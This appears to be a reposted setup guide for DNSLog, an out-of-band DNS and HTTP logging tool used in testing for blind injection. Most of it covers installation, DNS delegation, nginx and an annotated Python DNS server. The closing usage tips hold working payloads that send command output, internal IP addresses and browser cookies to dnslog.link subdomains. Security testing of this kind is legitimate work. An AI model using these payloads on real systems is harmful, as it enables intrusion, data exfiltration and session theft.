Hacking Book | Free Online Hacking Learning

BugScanTeam / DNSLog: DNSLog is a tool for monitoring DNS resolution records and HTTP access records.

Posted by bassolino at 2020-02-27
 ____  _   _ ____  _
|  _ \| \ | / ___|| |    ___   __ _
| | | |  \| \___ \| |   / _ \ / _` |
| |_| | |\  |___) | |__| (_) | (_| |
|____/|_| \_|____/|_____\___/ \__, |
                              |___/

Brief introduction

DNSLog is a tool for monitoring DNS resolution records and HTTP access records, created by the BugScan team at Clover Security (四叶草安全). It plays an important role in detecting blind injection vulnerabilities (the payload makes the target look up a name or fetch a URL you control, so the result shows up here even when the target itself returns nothing) and is one of the core libraries of the distributed vulnerability scanning framework BugScan.

DNSLog is built on the Django framework and bundles its own DNS server, so a working environment is easy to set up.

A public demo site is available (the link is not preserved in this copy).

Install

Clone the latest source code from the repository with Git:

$ git clone git@github.com:BugScanTeam/DNSLog.git

Or download the latest source code as a zip archive and extract it:

$ wget https://github.com/BugScanTeam/DNSLog/archive/master.zip
$ unzip master.zip

Django 1.8 and dnslib must be installed before DNSLog can be used. If they are already installed, skip this step; otherwise enter the directory the clone or unzip produced (DNSLog, or DNSLog-master for the zip) and install the requirements:

$ cd DNSLog
$ pip install -r requirements.pip

Django 1.8 reached end of life in 2018 and receives no security fixes, so run DNSLog on a host that holds nothing else of value.

Domain name and public IP preparation

To build and use DNSLog you need two domain names, one for the NS server hostnames (for example a.com) and one as the recording domain (for example b.com), plus a public IP address. The README uses 1.1.1.1 as a placeholder; substitute the address of your own server.

Note: the registrar of b.com must support custom NS records; the registrar of a.com does not need to.

1. Set two A records in a.com:

ns1.a.com    A    1.1.1.1
ns2.a.com    A    1.1.1.1

2. Change the NS records of b.com to the two hostnames set in step 1:

b.com    NS    ns1.a.com
b.com    NS    ns2.a.com

This is done in the registrar's control panel. Some registrars only let you choose from their own verified nameservers, so you need a registrar for b.com that accepts arbitrary NS hostnames.

Note: in some regions it takes 24-48 hours for the NS change to take effect.

3. Modify the configuration file

Edit the relevant settings in dnslog/dnslog/settings.py. The domain names here correspond to the ones prepared in steps 1 and 2:

# domain whose lookups are recorded
DNS_DOMAIN = 'b.com'
# domain of the management console; the prefix is up to you
ADMIN_DOMAIN = 'admin.b.com'
# NS hostnames
NS1_DOMAIN = 'ns1.a.com'
NS2_DOMAIN = 'ns2.a.com'
# public IP address of the server
SERVER_IP = '1.1.1.1'

Then start the service:

$ cd dnslog/
$ sudo python manage.py runserver 0.0.0.0:80

Django's development server listens on port 8000 by default; binding port 80 requires root. Keep in mind that runserver is Django's development server and is not designed to face the internet, and running it as root means any bug in it is exploitable as root.

If you don't want to start on port 80 but still want HTTP without a port number in the URL, install nginx yourself and reverse-proxy b.com to the Django process.

Nginx reverse proxy reference script (not reproduced in this copy):
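The project's reference script is not in this copy; the server block below is an added example of the kind of configuration meant here, not DNSLog's own script. It assumes Django (runserver or gunicorn) is listening on 127.0.0.1:8000, that b.com is the recording domain from the settings above, and that the certificate and key paths are placeholders for wherever acme.sh installs them.

```nginx
# Added example, not DNSLog's reference script.
# Assumptions: Django on 127.0.0.1:8000; b.com is DNS_DOMAIN; certificate paths are placeholders.
server {
    listen 80;
    listen 443 ssl;                       # add this line only once the certificate files exist
    # the recording domain, the admin console, and every per-user recording subdomain
    server_name b.com *.b.com;

    ssl_certificate     /etc/nginx/ssl/b.com.fullchain.cer;   # placeholder path
    ssl_certificate_key /etc/nginx/ssl/b.com.key;             # placeholder path

    location / {
        # pass the request line through unchanged: the weblog records the raw path and query string
        proxy_pass http://127.0.0.1:8000;
        proxy_set_header Host            $host;
        # behind a proxy Django sees 127.0.0.1 as REMOTE_ADDR; the real client address is in these headers
        proxy_set_header X-Real-IP       $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    }
}
```

Two practical points: keep the plain port 80 listener even after HTTPS is set up, because injected payloads normally use http:// URLs; and check how DNSLog's views obtain the client address, since a weblog entry that shows 127.0.0.1 for every hit means the application is reading REMOTE_ADDR instead of the forwarded header.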

HTTPS wildcard certificate (Let's Encrypt)

Install acme.sh (review the installer before piping it into a shell):

curl https://get.acme.sh | sh

Start the DNS server on its own:

python zoneresolver.py

Add the DNS API hook script for acme.sh. This is the script that --dns dns_log refers to below; acme.sh looks it up in its dnsapi directory, and its job is to publish the _acme-challenge TXT record through the DNSLog DNS server so that Let's Encrypt can validate the wildcard. The script itself is not reproduced in this copy.

Issue the certificate (xxx.com stands for your recording domain, b.com above):

acme.sh --issue -d "*.xxx.com" --dns dns_log --debug --dnssleep 10

--dnssleep 10 makes acme.sh wait 10 seconds for the TXT record to become visible instead of polling for it.

Install the certificate (the command is not reproduced in this copy).

acme.sh checks certificate expiry automatically and, after obtaining a renewed certificate, restarts nginx so that the new certificate takes effect.

Site management

After the service has started, visit http://b.com/admin/ to reach the admin back end.

The administrator username and password are both admin by default. Change them before exposing the service, since the admin interface is reachable on the public domain.

If you forget the administrator password, enter the dnslog directory and run the following command to reset it:

python manage.py changepassword admin

Ordinary users

Add users in the user table. A default account test / 123456 already exists; remove it or change its password, because anyone who knows it can read everything recorded under test.b.com.

Visit http://admin.b.com (the domain set in ADMIN_DOMAIN) and log in with the username and password.

After logging in you will see your second-level domain, such as test.b.com. A request for any name under that domain is recorded, for example demo.test.b.com.

Usage tips

Exploiting blind command injection

For blind command injection vulnerabilities (the command runs but its output is never shown), you can route the output through the weblog part of DNSLog: the output of a backtick-substituted command becomes part of the requested URL, so it is recorded along with the request:

curl "http://testhash.test.dnslog.link/?`whoami`"

The result shows up in the web console (screenshot not reproduced). This works cleanly only when the output is a single token without spaces or shell metacharacters; for anything larger, encode it first (for example with base64 or hex), and when exfiltrating through DNS rather than HTTP keep each label at 63 characters or fewer.

Getting the source IP address from a DNS record

See issue 3 for details.

ping -c 3 `ifconfig en0|grep "inet "|awk '{print $2}'`.test.dnslog.link

The local address of interface en0 (macOS naming; use the appropriate interface elsewhere) becomes the leftmost label of the name being resolved, so the DNS log shows the target's internal IP as the subdomain and the public IP the query came from as the source. The effect looks like this:

➜  ~ ping -c 3 `ifconfig en0|grep "inet "|awk '{print $2}'`.test.dnslog.link
PING 192.168.10.167.test.dnslog.link (106.186.118.146): 56 data bytes
64 bytes from 106.186.118.146: icmp_seq=0 ttl=52 time=259.491 ms
64 bytes from 106.186.118.146: icmp_seq=1 ttl=52 time=307.566 ms
64 bytes from 106.186.118.146: icmp_seq=2 ttl=52 time=352.757 ms

--- 192.168.10.167.test.dnslog.link ping statistics ---
3 packets transmitted, 3 packets received, 0.0% packet loss
round-trip min/avg/max/stddev = 259.491/306.605/352.757/38.082 ms
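As an added example (not the project's zoneresolver.py and not code from the README), the following Python models what the DNS side does with the settings from step 3 and with the ping above: a minimal authoritative server for b.com that logs (source IP, queried name) for every query, answers A for any name in the zone with SERVER_IP, and answers NS for the zone with ns1.a.com and ns2.a.com. The domain names and 1.1.1.1 are the README's placeholders; the client address 203.0.113.7 used when exercising it is constructed. It uses only the standard library, so it does not need dnslib.

```python
# Added example, not DNSLog's zoneresolver.py: the DNS side of a DNSLog-style server, standard library only.
import socket
import struct
import time

DNS_DOMAIN = "b.com"                    # same values as settings.py above
NS_DOMAINS = ("ns1.a.com", "ns2.a.com")
SERVER_IP = "1.1.1.1"                   # placeholder address, as in the README
QTYPE_A, QTYPE_NS = 1, 2
LOG = []                                # (unix time, client ip, queried name, qtype): the DNS log itself

def encode_name(name):
    """'a.b.com' -> length-prefixed labels ending in a zero byte (uncompressed wire form)."""
    out = b""
    for label in name.rstrip(".").split("."):
        if not 1 <= len(label) <= 63:   # RFC 1035 label limit: why long exfil output must be chunked
            raise ValueError("bad label %r" % label)
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"

def decode_name(pkt, off):
    """Read a name at pkt[off], following compression pointers; return (name, offset after it)."""
    labels, end, hops = [], None, 0
    while True:
        length = pkt[off]
        if length & 0xC0 == 0xC0:       # compression pointer (RFC 1035 4.1.4); hop limit defeats pointer loops
            hops += 1
            if hops > 16:
                raise ValueError("pointer loop")
            end = off + 2 if end is None else end
            off = struct.unpack("!H", pkt[off:off + 2])[0] & 0x3FFF
            continue
        off += 1
        if length == 0:
            return ".".join(labels), off if end is None else end
        labels.append(pkt[off:off + length].decode("ascii"))
        off += length

def build_query(name, qtype, txid=0x1234):
    """Standard recursion-desired query; used by the tests and usable as a tiny client."""
    return struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0) + encode_name(name) + struct.pack("!HH", qtype, 1)

def rr(name, qtype, rdata, ttl=0):      # one resource record; TTL 0 so no resolver caches an exfil name
    return encode_name(name) + struct.pack("!HHIH", qtype, 1, ttl, len(rdata)) + rdata

def handle(packet, client_ip):
    """Parse one query, log (client ip, name), return the response bytes."""
    txid, flags = struct.unpack("!HH", packet[:4])
    qname, off = decode_name(packet, 12)
    qtype = struct.unpack("!HH", packet[off:off + 4])[0]
    question, lname, rd = packet[12:off + 4], qname.lower(), flags & 0x0100
    LOG.append((time.time(), client_ip, lname, qtype))   # the whole point of DNSLog: who asked for what
    if not (lname == DNS_DOMAIN or lname.endswith("." + DNS_DOMAIN)):
        return struct.pack("!HHHHHH", txid, 0x8005 | rd, 1, 0, 0, 0) + question   # QR=1, RCODE=5 REFUSED
    answers = []
    if qtype == QTYPE_NS and lname == DNS_DOMAIN:
        answers = [rr(qname, QTYPE_NS, encode_name(ns)) for ns in NS_DOMAINS]
    elif qtype == QTYPE_A:              # any name under the zone resolves to the server itself
        answers = [rr(qname, QTYPE_A, socket.inet_aton(SERVER_IP))]
    # QR=1, AA=1, NOERROR; zero answers for any other type is a NODATA reply
    return struct.pack("!HHHHHH", txid, 0x8400 | rd, 1, len(answers), 0, 0) + question + b"".join(answers)

def parse_answers(resp):
    """Decode the answer section into (name, qtype, rdata as text) tuples."""
    qd, an = struct.unpack("!HH", resp[4:8])
    off, out = 12, []
    for _ in range(qd):
        off = decode_name(resp, off)[1] + 4
    for _ in range(an):
        name, off = decode_name(resp, off)
        qtype, _, _, rdlen = struct.unpack("!HHIH", resp[off:off + 10])
        off += 10
        raw = resp[off:off + rdlen]
        data = (socket.inet_ntoa(raw) if qtype == QTYPE_A
                else decode_name(resp, off)[0] if qtype == QTYPE_NS else raw.hex())
        off += rdlen
        out.append((name, qtype, data))
    return out

def records_for(user):
    """What the console shows for <user>: (client ip, attacker-chosen prefix) for each hit under <user>.b.com."""
    suffix = "." + user + "." + DNS_DOMAIN
    return [(ip, name[:-len(suffix)]) for _, ip, name, _ in LOG if name.endswith(suffix)]

def serve(bind="0.0.0.0", port=53):
    """UDP loop; this is what must answer on SERVER_IP for the NS delegation of b.com to work."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind((bind, port))
    while True:
        data, addr = sock.recvfrom(512)
        try:
            sock.sendto(handle(data, addr[0]), addr)
        except (struct.error, IndexError, ValueError, UnicodeDecodeError):
            pass                        # malformed packet: drop it and keep logging
if __name__ == "__main__":
    serve()
```

Run it as root (port 53) on the host that ns1.a.com and ns2.a.com point to, and a lookup of 192.168.10.167.test.b.com from anywhere both resolves to 1.1.1.1 and leaves an entry in LOG whose name carries the internal address and whose client IP is the public address the query came from; records_for("test") is the view the console gives that user. Two details worth keeping in a real resolver: the TTL of 0 stops caching resolvers from hiding repeat hits, and the pointer-hop limit in decode_name is what keeps a malicious compression loop in a crafted query from hanging the server.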

Blind XSS

Add the following code to a page with an XSS vulnerability:

var s = document.createElement('img');
// encode both values: a cookie or URL containing '&' or '#' would otherwise corrupt the query string
s.src = "http://xss.test.dnslog.link/?url=" + encodeURIComponent(document.location)
      + "&cookie=" + encodeURIComponent(document.cookie);
document.head.appendChild(s);

Taking httpbin.org as the example target: once the payload fires, the request appears in the weblog with the page URL and the cookies readable from script (cookies flagged HttpOnly are not included).

Related links